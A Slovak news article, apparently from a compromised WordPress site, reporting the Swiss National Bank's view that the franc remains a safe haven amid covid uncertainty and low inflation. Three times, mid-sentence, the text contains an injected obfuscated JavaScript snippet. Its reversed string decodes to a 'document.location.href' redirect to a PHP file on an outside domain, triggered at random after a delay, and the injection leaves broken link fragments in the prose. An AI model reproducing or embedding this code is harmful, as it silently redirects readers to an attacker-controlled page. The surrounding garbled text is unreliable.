švajčiarsky frank

Frank je stále chápaný ako bezpečný prístav, znie zo Švajčiarskej národnej banky

Záujem o švajčiarsky frank ako bezpečnú menu neslabne. A je veľmi pravdepodobné, že dopyt po ňom porastie s tým, ako sa na svetových trhoch bude zvyšovať neistota prameniaca z nástupu ďalšej vlny epidémie covidu.

„Stále sa nachádzame v teritóriu, kde frank je veľmi vysoko,“ povedala Andrea Mächlerová, členka vedenia Švajčiarskej národnej banky na štvrtkovom stretnutí s novinármi. Súčasne dodala, že nevie, kam sa až kurz $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar/“>švajčiarskeho franku môže vyšplhať. „Realita je taká, že naša mena si drží povesť bezpečného prístavu. Neistoty zostávajú vysoké, pretože covidová kríza tu je stále s nami,“ dodala Mächlerová.

V prospech švajčiarskeho franku hrá aj fakt, že inflácia, akú zažíva Európa alebo Spojené štáty, sa Švajčiarsku zatiaľ vyhýba. Jej aktuálna výška dosahuje v medziročnom vyjadrení iba 1,2 percenta. $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar-na-to-reaguje-posilnovanim/“>Posilňovanie franku sa ale nakoniec môže obrátiť proti alpskej krajine, pretože je bytostne závislá od exportu najmä svojich služieb.

Silnúci frank ich potom cudzincom logicky predražuje, čo tlmí $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopytu-po-rope-predpoveda-medzinarodna-agentura-pre-energiu/“>dopyt po nich. Mächlerová preto potvrdila pripravenosť Švajčiarskej národnej banky proti príliš silnému franku zasiahnuť, podobne ako to urobila pred šiestimi rokmi.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *